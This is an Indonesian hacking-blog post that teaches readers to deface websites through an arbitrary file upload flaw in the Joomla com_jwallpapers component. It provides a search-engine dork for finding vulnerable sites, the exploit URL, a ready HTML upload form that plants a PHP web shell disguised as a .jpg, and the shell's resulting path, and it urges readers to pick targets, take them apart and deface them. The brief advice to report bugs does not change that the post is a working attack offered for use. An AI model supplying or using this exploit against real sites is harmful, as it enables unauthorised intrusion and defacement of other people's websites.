Lompat ke konten Lompat ke sidebar Lompat ke footer

Joomla Component com_jwallpapers Arbitrary File Upload

Hello World; Malam Fans, Please Say Hello Haters ;*
yoehh Gengs, lanjut lagi Walking Blog :D , Nah kali ini Gue cuma mau berbagi tentang salah satu Exploit Joomla(salah satu Bug/Celah pada CMS Joomla).
Yupz, Tutorial Deface CMS Joomla dengan eXploit Component com_jwallpapers Arbitrary File Upload.
Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component jwallpapers di CMS Joomla. hahaha, ini eXploit masih Hot banget, hasil riset dari indoXploit juga *tengkyuh ster

Let's Play with me Baby ;*


Dork:
inurl:/index.php?option=com_jwallpapers
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

eXploit:
/index.php?option=com_jwallpapers&task=upload

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_jwallpapers&task=upload

3. Vulnerability ~ {"jsonrpc" : "2.0", "result" : null, "id" : "id"}


CSRF Xploit Code:

<html>
<body>
<form method="post" action="target.c0li/index.php?option=com_jwallpapers&task=upload" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="hidden" name="name" value="shell_kalian.php" />
<input type="submit" value="submit"/>
</form>
</body>
</html>

NB
Ubah bagian shell_kalian.php dengan nama shell yang kalian ingin kan ( ex: shell.php ), dan juga shell yang kalian upload harus ber-extensi .jpg (ex: shell.jpg). Tanpa harus menggunakan tamper data dan sebagainya.

4. Jika sudah ada yg vuln, lanjut copy nih Uploader CSRF nya, save dgn ekstensi .html & buka dgn browser kalean.

inget, shell harus berekstensi .jpg , dan nanti nama shell kalian ke ubah seperti yg kalean tulis di csrf, ektensinya juga jadi .php

Setelah Kalian Xploit, maka hasilnya akan tetap sama seperti ini:

tidak ada tulisan error sama sekali.
Shell akses: 
http://target.com/jwallpapers_files/plupload/shell_kalian.php

Gimana Mau PhP, HTML aja masih belajar :'D
Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) )) 
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai para WebMaster ;*

"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Joomla Hacked~
Sekian dan semoga bermanfaat .. terimakasih

Source and thanks to: Mr. Error 404 - IndoXploit


./Nuenomaru

Kami bikin Sejarah, Bukan hanya Barisan Kisah


Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Posting Komentar untuk "Joomla Component com_jwallpapers Arbitrary File Upload"